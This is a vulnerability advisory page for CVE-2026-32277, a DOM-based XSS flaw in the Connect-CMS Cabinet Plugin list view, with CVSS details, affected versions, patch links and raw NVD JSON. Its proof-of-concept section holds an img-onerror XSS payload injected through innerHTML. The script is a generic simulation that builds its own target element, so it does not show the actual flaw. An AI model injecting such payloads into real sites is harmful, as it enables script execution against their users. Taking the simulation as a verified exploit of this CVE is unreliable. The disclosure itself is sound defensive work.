Security Vulnerability Report
CVE-2026-32277 CVSS 8.7 HIGH

Published: 2026-03-23 22:16:27
Last Modified: 2026-03-24 20:01:38

Description

Connect-CMS is a content management system. In versions 1.35.0 through 1.41.0 and 2.35.0 through 2.41.0, a DOM-based Cross-Site Scripting (XSS) issue exists in the Cabinet Plugin list view. Versions 1.41.1 and 2.41.1 contain a patch.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:* - VULNERABLE (Connect-CMS 1.35.0 - 1.41.0; fixed in 1.41.1)
cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:* - VULNERABLE (Connect-CMS 2.35.0 - 2.41.0; fixed in 2.41.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!--
  PoC for CVE-2026-32277: Connect-CMS DOM-based XSS
  Description: This script simulates the exploitation of the DOM XSS vulnerability
  in the Cabinet Plugin list view by injecting a payload via a vulnerable parameter.
-->
<script>
// Simulating the vulnerable sink in the Cabinet Plugin list view.
// In a real scenario, this data comes from the URL hash or query parameters
// controlled by the attacker.
function exploit() {
  var maliciousPayload = '<img src=x onerror=alert(\'XSS-CVE-2026-32277\')>';
  // The vulnerability occurs when user input is directly placed into the DOM
  // without sanitization, for example using innerHTML.
  var vulnerableElement = document.getElementById('plugin-list-container');
  if (vulnerableElement) {
    console.log('Injecting payload into DOM...');
    vulnerableElement.innerHTML = maliciousPayload;
  } else {
    console.log('Target element not found. Creating a test element.');
    var testDiv = document.createElement('div');
    testDiv.id = 'plugin-list-container';
    document.body.appendChild(testDiv);
    testDiv.innerHTML = maliciousPayload;
  }
}
// Execute the exploit
exploit();
</script>

References

Patch: https://github.com/opensource-workshop/connect-cms/commit/c04dc40f814eff891915752ef1ec00ba6612441c
Release Notes: https://github.com/opensource-workshop/connect-cms/releases/tag/v1.41.1
Release Notes: https://github.com/opensource-workshop/connect-cms/releases/tag/v2.41.1
Vendor Advisory: https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-cmfh-mpmf-fmq4

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-32277",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-23T22:16:27.260",
    "lastModified": "2026-03-24T20:01:38.470",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Connect-CMS is a content management system. In versions 1.35.0 through 1.41.0 and 2.35.0 through 2.41.0, a DOM-based Cross-Site Scripting (XSS) issue exists in the Cabinet Plugin list view. Versions 1.41.1 and 2.41.1 contain a patch."},
      {"lang": "es", "value": "Connect-CMS es un sistema de gestión de contenido. En las versiones 1.35.0 a 1.41.0 y 2.35.0 a 2.41.0, existe un problema de cross-site scripting (XSS) basado en DOM en la vista de lista del plugin Cabinet. Las versiones 1.41.1 y 2.41.1 contienen un parche."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 5.8
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.35.0", "versionEndExcluding": "1.41.1", "matchCriteriaId": "6DF5FAFA-D40D-41DD-8063-0FC58BFDF13F"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.35.0", "versionEndExcluding": "2.41.1", "matchCriteriaId": "8390303C-0316-455A-AF15-2682746BF7AD"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/opensource-workshop/connect-cms/commit/c04dc40f814eff891915752ef1ec00ba6612441c", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v1.41.1", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v2.41.1", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-cmfh-mpmf-fmq4", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}